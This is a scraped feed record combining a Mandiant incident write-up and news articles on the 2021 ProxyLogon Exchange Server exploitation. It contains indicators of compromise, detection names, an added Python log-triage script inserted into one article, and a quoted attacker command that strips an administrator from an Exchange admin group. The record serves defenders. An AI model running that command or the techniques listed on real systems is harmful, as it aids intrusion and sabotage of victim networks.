This second, partially obfuscated web shell, named iisstart.aspx (MD5: 0fd9bffa49c76ee12e51e3b8ae0609ac), was more advanced and contained functions to interact with the file system. As seen in Figure 2, the web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files.\n\n\n\n \nFigure 2: Snippet of iisstart.aspx, uploaded by the attacker in late January 2021\n\nWhile the use of web shells is common amongst threat actors, the parent processes, timing, and victim(s) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange.\n\nIn March 2021, in a separate environment, we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server. This was likely to establish both persistence and secondary access, as in other environments. In this case, Mandiant observed the process w3wp.exe, (the IIS process associated with the Exchange web front-end) spawning cmd.exe to write a file to disk. The file, depicted in Figure 3, matches signatures for the tried-and-true [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>).\n\n\n\n \nFigure 3: Snippet of China Chopper web shell found on a compromised Exchange Server system\n\nWe observed that in at least two cases, the threat actors subsequently issued the following command against the Exchange web server:\n\nnet group \"Exchange Organization administrators\" administrator /del /domain.\n\nThis command attempts to delete the administrator user from the Exchange Organizations administrators group, beginning with the Domain Controller in the current domain. 
If the system is in a single-system domain, it will execute on the local computer.\n\nPer Microsoft\u2019s blog, they have identified additional post-exploitation activities, including:\n\n * Credential theft via dumping of LSASS process memory.\n * Compression of data for exfiltration via 7-Zip.\n * Use of Exchange PowerShell Snap-ins to export mailbox data.\n * Use of additional offensive security tools [Covenant](<https://github.com/cobbr/Covenant>), [Nishang](<https://github.com/samratashok/nishang>), and [PowerCat](<https://github.com/besimorhino/powercat>) for remote access.\n\nThe activity we have observed, coupled with others in the information security industry, indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments. This activity is followed quickly by additional access and persistent mechanisms. As previously stated, we have multiple ongoing cases and will continue to provide insight as we respond to intrusions.\n\n#### Investigation Tips\n\nWe recommend checking the following for potential evidence of compromise:\n\n * Child processes of C:\\Windows\\System32\\inetsrv\\w3wp.exe on Exchange Servers, particularly cmd.exe.\n * Files written to the system by w3wp.exe or UMWorkerProcess.exe.\n * ASPX files owned by the SYSTEM user\n * New, unexpected compiled ASPX files in the Temporary ASP.NET Files directory\n * Reconnaissance, vulnerability-testing requests to the following resources from an external IP address: \n * /rpc/ directory\n * /ecp/DDI/DDIService.svc/SetObject\n * Non-existent resources\n * With suspicious or spoofed HTTP User-Agents\n * Unexpected or suspicious Exchange PowerShell SnapIn requests to export mailboxes\n\nIn our investigations to date, the web shells placed on Exchange Servers have been named differently in each intrusion, and thus the file name alone is not a high-fidelity indicator of compromise.\n\nIf you believe your Exchange Server was compromised, we recommend 
investigating to determine the scope of the attack and dwell time of the threat actor.\n\nFurthermore, as system and web server logs may have time or size limits enforced, we recommend preserving the following artifacts for forensic analysis:\n\n * At least 14 days of HTTP web logs from the inetpub\\Logs\\LogFiles directories (include logs from all subdirectories)\n * The contents of the Exchange Web Server (also found within the inetpub folder)\n * At least 14 days of Exchange Control Panel (ECP) logs, located in Program Files\\Microsoft\\Exchange Server\\v15\\Logging\\ECP\\Server\n * Microsoft Windows event logs\n\nWe have found significant hunting and analysis value in these log folders, especially for suspicious CMD parameters in the ECP Server logs. We will continue updating technical details as we observe more related activity.\n\n#### Technical Indicators\n\nThe following are technical indicators we have observed, organized by the threat groups we currently associate with this activity. To increase investigation transparency, we are including a Last Known True, or LKT, value for network indicators. 
The LKT timestamp indicates the last time Mandiant knew the indicator was associated with the adversary; however, as with all ongoing intrusions, a reasonable time window should be considered.\n\n##### UNC2639\n\n| **Indicator** | **Type** | **Note** |\n|---|---|---|\n| 165.232.154.116 | Network: IP Address | Last known true: 2021/03/02 02:43 |\n| 182.18.152.105 | Network: IP Address | Last known true: 2021/03/03 16:16 |\n\n##### UNC2640\n\n| **Indicator** | **Type** | **MD5** |\n|---|---|---|\n| help.aspx | File: Web shell | 4b3039cf227c611c45d2242d1228a121 |\n| iisstart.aspx | File: Web shell | 0fd9bffa49c76ee12e51e3b8ae0609ac |\n\n##### UNC2643\n\n| **Indicator** | **Type** | **MD5/Note** |\n|---|---|---|\n| Cobalt Strike BEACON | File: Shellcode | 79eb217578bed4c250803bd573b10151 |\n| 89.34.111.11 | Network: IP Address | Last known true: 2021/03/03 21:06 |\n| 86.105.18.116 | Network: IP Address | Last known true: 2021/03/03 21:39 |\n\n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. 
The following contains specific detection names that provide an indicator of Exchange Server exploitation or post-exploitation activities we associated with these threat actors.\n\n**_Platform_(s)**\n\n| \n\n**_Detection Name_** \n \n---|--- \n \n * Network Security \n * Email Security \n * Detection On Demand \n * Malware File Scanning \n * Malware File Storage Scanning \n| \n\n * FEC_Trojan_ASPX_Generic_2\n * FE_Webshell_ASPX_Generic_33\n * FEC_APT_Webshell_ASPX_HEARTSHELL_1\n * Exploit.CVE-2021-26855 \n \nEndpoint Security\n\n| \n\n**_Real-Time (IOC)_**\n\n * SUSPICIOUS CODE EXECUTION FROM EXCHANGE SERVER (EXPLOIT)\n * ASPXSPY WEBSHELL CREATION A (BACKDOOR)\n * PROCDUMP ON LSASS.EXE (METHODOLOGY)\n * TASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\n * NISHANG POWERSHELL TCP ONE LINER (BACKDOOR)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n\n**_Malware Protection (AV/MG)_**\n\n * Trojan.Agent.Hafnium.A\n\n**_Module Coverage_**\n\n * [Process Guard] - prevents dumping of LSASS memory using the procdump utility. 
\n \nHelix\n\n| \n\n * WINDOWS METHODOLOGY [Unusual Web Server Child Process]\n * MICROSOFT EXCHANGE [Authentication Bypass (CVE-2021-26855)]\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T00:00:00", "type": "fireeye", "title": "Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T00:00:00", "id": "FIREEYE:C650A7016EEAD895903FB350719E53E3", "href": "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-AxSsNt-9gYo/YD838gSOOTI/AAAAAAAAB7Q/IuSgG26w0NU-eyKMabZMnUfb7QBDyHkUgCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nMicrosoft has [released emergency patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four 
previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. 
The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity and Dubex are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" purposes.\n\n[](<https://thehackernews.com/images/-_eUnJYSlv7A/YD86dcga76I/AAAAAAAAB7Y/Ex1kb11XGtcD6b878ASeDzA-SFz8SSzNgCLcBGAsYHQ/s0/ms.jpg>)\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. 
But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) a [nmap plugin](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. 
Customers using a vulnerable version of Exchange Server are advised to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", 
"CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LOLhcDcH4Q0/YEX4fZpKfUI/AAAAAAAAB9w/I0oQNqeVV2YmhlyC8lyvV-LztA9giv0vACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nMicrosoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling an escalation that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. 
\u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nA successful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. 
With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\n[](<https://thehackernews.com/images/-zR_JCeV5Moo/YEX5KX2rxLI/AAAAAAAAB94/XG6lQGCnfO0ZUBwgiwv9agIbi4TfP1csACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. 
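\n\nThe log check that CISA points to above can be reproduced without Microsoft's own script. What follows is an added example, not code from the article, Microsoft or CISA: it parses Exchange HttpProxy logs and applies the CVE-2021-26855 indicator from Microsoft's HAFNIUM guidance, an unauthenticated request whose AnchorMailbox matches ServerInfo~*/*. The log lines are constructed, the five-column layout is a simplification of the real log (which carries many more fields), and the host names and IP addresses are placeholders.\n\n

```python
# Added example (not from the article or from Microsoft's CSS-Exchange script):
# triage Exchange HttpProxy logs for the CVE-2021-26855 SSRF indicator from
# Microsoft's HAFNIUM guidance: an unauthenticated request whose AnchorMailbox
# matches ServerInfo~*/* . The rows below are constructed; the column subset is
# an assumption (real HttpProxy logs carry many more fields).
import csv
import fnmatch

# Constructed sample in the shape of an HttpProxy log: '#' metadata lines,
# a '#Fields:' header, then one CSV row per request.
SAMPLE_HTTPPROXY_LOG = '''#Software: Microsoft Exchange Server
#Log-type: HttpProxy Logs
#Fields: DateTime,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox
2021-03-01T10:14:02.117Z,198.51.100.7,/owa/auth/logon.aspx,,
2021-03-01T10:15:41.552Z,198.51.100.7,/ecp/default.aspx,,ServerInfo~ex01.corp.example/autodiscover/autodiscover.xml?#
2021-03-01T10:16:03.009Z,203.0.113.9,/ecp/,,ServerInfo~ex01.corp.example/ecp/?msExchEcpCanary=abc#
2021-03-01T10:20:12.300Z,192.0.2.44,/ecp/,CORP/jdoe,ServerInfo~ex01.corp.example/ecp/?msExchEcpCanary=def#
2021-03-01T10:21:55.781Z,192.0.2.45,/ews/exchange.asmx,CORP/asmith,SMTP~asmith@corp.example
'''

# Wildcard form taken from Microsoft's published query.
SSRF_ANCHOR_PATTERN = 'ServerInfo~*/*'


def parse_httpproxy_log(text):
    '''Yield one dict per request row, skipping '#' metadata lines and taking
    column names from the '#Fields:' header.'''
    fields = None
    for line in text.splitlines():
        if line.startswith('#Fields:'):
            fields = [f.strip() for f in line[len('#Fields:'):].split(',')]
            continue
        if line.startswith('#') or not line.strip():
            continue
        if fields is None:
            raise ValueError('data row seen before the #Fields: header')
        values = next(csv.reader([line]))
        yield dict(zip(fields, values))


def is_ssrf_indicator(row):
    '''True when the request was unauthenticated AND its AnchorMailbox has the
    ServerInfo~<host>/<path> shape the CVE-2021-26855 exploit relies on. Both
    conditions are required: the fourth sample row carries the same anchor
    but is authenticated, and is deliberately not flagged.'''
    unauthenticated = row.get('AuthenticatedUser', '').strip() == ''
    anchor = row.get('AnchorMailbox', '')
    return unauthenticated and fnmatch.fnmatchcase(anchor, SSRF_ANCHOR_PATTERN)


def find_ssrf_hits(text):
    '''Return the suspicious rows, reduced to the fields an analyst pivots on
    (time, source IP, requested stem, backend target).'''
    keep = ('DateTime', 'ClientIpAddress', 'UrlStem', 'AnchorMailbox')
    hits = []
    for row in parse_httpproxy_log(text):
        if is_ssrf_indicator(row):
            hits.append({k: row[k] for k in keep})
    return hits


if __name__ == '__main__':
    for hit in find_ssrf_hits(SAMPLE_HTTPPROXY_LOG):
        print(hit['DateTime'], hit['ClientIpAddress'], hit['UrlStem'], '->', hit['AnchorMailbox'])
```

\n\nA hit means an unauthenticated caller steered the front end to a backend path of its choosing, which is the SSRF primitive, so every hit deserves a pivot on client IP and time window. No hits is not proof of no compromise: HttpProxy logs are rotated, and an intruder who already has a web shell can delete them, which is why the log query has to be paired with a sweep for web shells on disk.\n\n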
Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding that it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some of its customers' compromised Exchange servers had been seeded with crypto-mining software called [DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), a malware family documented by Carbon Black in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. 
They can be found [here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" Mat Gangwer, senior director of managed threat response at Sophos said. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", 
"CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-jpxSsQOpxfA/YFBKGEa4SeI/AAAAAAAACCU/KSoqbip59LE-7trSUlqLbRehavtGqXdwwCLcBGAsYHQ/s0/microsoft-azure-hacking-1.jpg>)\n\nMicrosoft on Monday released a one-click mitigation tool that applies all the necessary countermeasures to secure vulnerable environments against the ongoing widespread [ProxyLogon Exchange Server](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) cyberattacks.\n\nCalled Exchange On-premises Mitigation Tool ([EOMT](<https://github.com/microsoft/CSS-Exchange/tree/main/Security#exchange-on-premises-mitigation-tool-eomt>)), the PowerShell-based script mitigates current known attacks using CVE-2021-26855, scans the Exchange Server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) for any deployed web shells, and attempts to remediate the detected compromises.\n\n\"This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update,\" Microsoft [said](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe development comes in the wake of indiscriminate attacks against unpatched Exchange Servers across the world by more than ten advanced persistent threat actors \u2014 most of them government-backed cyberespionage groups \u2014 to plant backdoors, coin miners, and [ransomware](<https://thehackernews.com/2021/03/icrosoft-exchange-ransomware.html>), with the 
release of [proof-of-concept](<https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html>) (PoC) fueling the hacking spree even further.\n\nBased on telemetry from [RiskIQ](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/>), 317,269 out of 400,000 on-premises Exchange Servers globally have been patched as of March 12, with the U.S., Germany, Great Britain, France, and Italy leading the countries with vulnerable servers. \n\nAdditionally, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has [updated](<https://us-cert.cisa.gov/ncas/alerts/aa21-062a>) its guidance to detail as many as seven variants of the [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>) web shell that are being leveraged by malicious actors. \n\n[](<https://thehackernews.com/images/-KZiEV9wW7ew/YFBKIQY5ALI/AAAAAAAACCY/O_PgoFnkilgx5kMQCGC_LSY6EhsjeHPigCLcBGAsYHQ/s0/microsoft-exchange-security.jpg>)\n\nTaking up just four kilobytes, the web shell has been a popular [post-exploitation tool](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) of choice for cyber attackers for nearly a decade.\n\nWhile the breadth of the intrusions is being assessed, Microsoft is also reportedly investigating how the \"limited and targeted\" attacks it detected in early January picked up steam to quickly morph into a widespread mass exploitation campaign, forcing it to release the security fixes a week before it was due.\n\nThe Wall Street Journal on Friday [reported](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>) that investigators are focused on whether a Microsoft partner, with whom the company shared information about the vulnerabilities through its Microsoft Active Protections Program ([MAPP](<https://www.microsoft.com/en-us/msrc/mapp>)), either 
